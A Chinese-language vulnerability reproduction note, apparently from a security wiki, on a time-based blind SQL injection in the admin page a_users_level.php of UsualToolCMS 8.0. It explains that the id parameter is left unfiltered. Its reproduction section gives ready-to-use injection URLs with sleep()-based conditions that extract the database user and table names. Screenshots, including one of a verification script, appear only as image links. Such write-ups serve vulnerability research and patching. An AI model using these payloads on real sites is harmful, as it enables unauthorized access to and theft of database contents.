menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 131-UsualToolcms chevron_right 005-UsualToolcms 8.0 后台盲注.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    005-UsualToolcms 8.0 后台盲注.md
    1.08 KB / 2021-07-17 00:01:22
        # UsualToolcms 8.0 后台盲注
    
    ### 一、漏洞简介
    
    ### 二、漏洞影响
    
    UsualToolCMS-8.0-Release
    
    ### 三、复现过程
    
    漏洞分析
    
    ./cmsadmin/a_users_level.php第19行和第26行,id参数可控
    
    ![](images/15893739283426.png)
    
    
    从get处获取id参数,id存在无任何过滤,当postt id时,通过sqlcheck函数进行过滤,来到文件./class/UsualToolCMS_INC.php第33行,将(',,",null)转义,34行调用sqlchecks函数,比没过滤sql,然而a_users_level.php第19行id不是字符
    
    ![](images/15893739349296.png)
    
    
    #### 复现
    
    可以利用时间盲注来进行sql注入攻击,payload如下:
    
    
    ```bash
    a.当前数据库:http://url:8080/UsualToolCMS/cmsadmin/a_users_level.php?x=m&id=2 and if(ascii(substr(user(),1,1))=114,sleep(6),1)
    
    b.表:http://url:8080/UsualToolCMS/cmsadmin/a_users_level.php?x=m&id=2 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>30,sleep(6),1)
    ```
    
    ![](images/15893739596163.png)
    
    
    时间盲注验证脚本
    
    ![](images/15893739653517.png)
    
    
    ![](images/15893739700275.png)
    
    
    links
    file_download